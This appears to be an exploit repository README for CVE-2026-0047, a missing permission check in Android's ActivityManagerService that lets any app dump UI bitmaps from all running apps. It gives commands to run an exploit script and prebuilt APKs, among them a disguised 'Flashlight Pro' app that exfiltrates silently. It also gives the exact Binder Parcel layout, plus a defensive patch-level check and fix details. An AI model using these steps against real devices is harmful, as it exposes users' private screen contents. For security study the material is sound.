## https://sploitus.com/exploit?id=C3E9251E-4FF9-59FD-AE92-266794E6812A
# CVE-2026-0047: Missing Permission Check in ActivityManagerService
**Heap of bitmaps stolen from every running app: zero permissions, zero user interaction.**
A missing `enforceCallingOrSelfPermission(DUMP)` check in `ActivityManagerService.dumpBitmapsProto()` allows any installed app to exfiltrate UI bitmaps from all running processes on Android 16 QPR2 Beta (Baklava).
> **Note:** We did not discover this vulnerability. All credit for finding and responsibly reporting goes to the original researchers. This repository contains our independent **patch analysis, reproduction, and educational writeup** to help the security community understand the bug class and exploitation techniques involved.
| Field | Detail |
|---|---|
| **CVE** | CVE-2026-0047 |
| **Severity** | Critical (CVSS 8.4) |
| **Component** | `ActivityManagerService.dumpBitmapsProto()` |
| **Root Cause** | Missing permission check (CWE-280) |
| **Impact** | Any zero-permission app steals UI bitmaps from all running apps |
| **Affected** | Android 16 QPR2 Beta 1-3 (Baklava), patch level < 2026-03-01 |
| **Patched** | [March 2026 Android Security Bulletin](https://source.android.com/docs/security/bulletin/2026/2026-03-01) |
## Repository Contents
```
├── app/            # PoC exploit app (audit tool UI)
├── attacker/       # "Flashlight Pro", the disguised attacker app
├── apk/            # Pre-built APKs (ready to install)
│   ├── cve-2026-0047-poc.apk
│   └── flashlight-pro-attacker.apk
├── exploit.sh      # Single-shot exploit script
├── gradle/         # Gradle wrapper
└── README.md
```
## Setting Up the Test Environment
You need an Android 16 QPR2 Beta (Baklava) emulator with a security patch level before `2026-03-01`:
```bash
# Download the vulnerable system image
sdkmanager "system-images;android-Baklava;google_apis;arm64-v8a"
# Create an AVD
avdmanager create avd -n baklava -k "system-images;android-Baklava;google_apis;arm64-v8a"
# Boot the emulator
emulator -avd baklava &
# Verify the patch level is pre-fix
adb shell getprop ro.build.version.security_patch
# Anything before 2026-03-01 is vulnerable
```
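The `getprop` comparison above is the one fact a defender needs from this page: a build whose `ro.build.version.security_patch` is earlier than `2026-03-01` has not received the fix. The script below is an added example, not part of this repository, that turns that comparison into a reusable check with an explicit "inconclusive" result for malformed input (the property is empty on some custom builds). It assumes `adb` is on `PATH` and that a single device or emulator is attached when `--device` is used; the fix date comes from the bulletin linked on this page, and the sample value `2025-08-05` is the emulator patch level quoted in the Result section below.

```shell
#!/bin/sh
# Added example, not part of the CVE-2026-0047 PoC repository: classify a device's
# security patch level against the March 2026 fix date given in the bulletin.
# Assumes `adb` is on PATH and one device or emulator is attached when --device is used.

FIX_PATCH_LEVEL="2026-03-01"   # first patch level that carries the fix (from the bulletin)

# Exit status 0: patch level predates the fix (affected build).
# Exit status 1: patch level is at or after the fix.
# Exit status 2: input is not a YYYY-MM-DD patch level (inconclusive).
is_vulnerable_patch_level() {
    case "$1" in
        [0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]) ;;
        *) return 2 ;;
    esac
    # Zero-padded ISO dates order correctly as integers once the dashes are dropped.
    have=$(printf '%s' "$1" | tr -d '-')
    want=$(printf '%s' "$FIX_PATCH_LEVEL" | tr -d '-')
    if [ "$have" -lt "$want" ]; then return 0; else return 1; fi
}

# Prints a one-line verdict for a patch level string and propagates the status above.
report_patch_level() {
    rc=0
    is_vulnerable_patch_level "$1" || rc=$?
    case $rc in
        0) echo "patch level $1: predates $FIX_PATCH_LEVEL, build is affected by CVE-2026-0047" ;;
        1) echo "patch level $1: includes the $FIX_PATCH_LEVEL fix" ;;
        *) echo "patch level '$1': not a YYYY-MM-DD value, cannot judge" ;;
    esac
    return $rc
}

# Reads ro.build.version.security_patch from the attached device; adb shell output
# can carry a trailing CR on some hosts, so strip line endings before classifying.
check_attached_device() {
    level=$(adb shell getprop ro.build.version.security_patch 2>/dev/null | tr -d '\r\n')
    report_patch_level "$level"
}

# Usage: sh check_patch.sh 2025-08-05   (judge a value offline)
#        sh check_patch.sh --device     (query the attached emulator)
# With no argument the script only defines the functions, so it can be sourced.
case "${1:-}" in
    "") ;;
    --device) check_attached_device ;;
    *) report_patch_level "$1" ;;
esac
```

The exit status is deliberately three-valued so that a fleet-wide inventory script can separate "affected", "patched" and "could not read the property" instead of silently treating an empty string as safe.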
## Quick Start
### Option 1: Single-shot script (recommended)
```bash
# Full run: set up emulator, build, exploit, extract stolen bitmaps
./exploit.sh --setup-emulator
# Already have a Baklava emulator running?
./exploit.sh
# Skip build, just run exploit
./exploit.sh --skip-build
```
### Option 2: Pre-built APK
```bash
# Install the PoC app
adb install apk/cve-2026-0047-poc.apk
# Open some apps (Settings, email, etc.) to have visible UI
adb shell am start -n com.android.settings/.Settings
# Launch the PoC
adb shell am start -n com.poc.cve20260047/.MainActivity
# Tap "Exploit dumpBitmapsProto()" button
```
### Option 3: Attacker simulation ("Flashlight Pro")
```bash
# Install the disguised attacker app; it declares ZERO permissions
adb install apk/flashlight-pro-attacker.apk
# Launch it; exfiltration happens silently on startup
adb shell am start -n com.poc.cve20260047.attacker/.MainActivity
```
## How It Works
1. **Raw Binder probe.** Transaction code `#117` on the `activity` service maps to `dumpBitmapsProto()`. Sending it without arguments causes a `NullPointerException` inside AMS (not a `SecurityException`), proving the method body executes without any permission check.
2. **Raw Binder exploit.** We use `IBinder.transact()` to send a hand-crafted Parcel directly to AMS. This bypasses Android's hidden API restrictions entirely, so no `hidden_api_policy` setting is needed. The Parcel contains:
- Interface token (`android.app.IActivityManager`)
- Non-null marker + `ParcelFileDescriptor` (pipe write end)
- Empty string array (all processes)
- `userId = -2` (`USER_CURRENT`)
- `dumpAll = true`
- `format = "png"`
3. **Bitmap extraction.** AMS writes protobuf data containing PNG bitmaps to the pipe. We scan for PNG magic bytes (`89 50 4E 47`) and IEND trailers to extract individual images.
### Result
On a Baklava emulator (`BP41.250725.007`, patch `2025-08-05`) with Settings, Clock, and Files open:
- **679,091 bytes** of protobuf data
- **63 valid PNG images** stolen from all running apps
- **Zero permissions** declared by the PoC app
## How It Was Fixed
Google added `enforceCallingOrSelfPermission(DUMP)` as the first line of `dumpBitmapsProto()`, so unprivileged callers now get a `SecurityException` before any data is accessed.
## References
- [Android Security Bulletin, March 2026](https://source.android.com/docs/security/bulletin/2026/2026-03-01)
- [CVE-2026-0047 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-0047)
- [CWE-280: Improper Handling of Insufficient Permissions](https://cwe.mitre.org/data/definitions/280.html)
- [Blog post: Full analysis and exploitation walkthrough](https://www.mobilehackingcourse.com/cve-2026-0047-activitymanager-eop/)
## Credits
Research and PoC by [Mobile Hacking Lab](https://www.mobilehackinglab.com). We reproduced this vulnerability independently for educational purposes.
## Disclaimer
This proof of concept is provided for **educational and authorized security research purposes only**. Only use it on devices and environments you own or have explicit permission to test. The authors are not responsible for any misuse.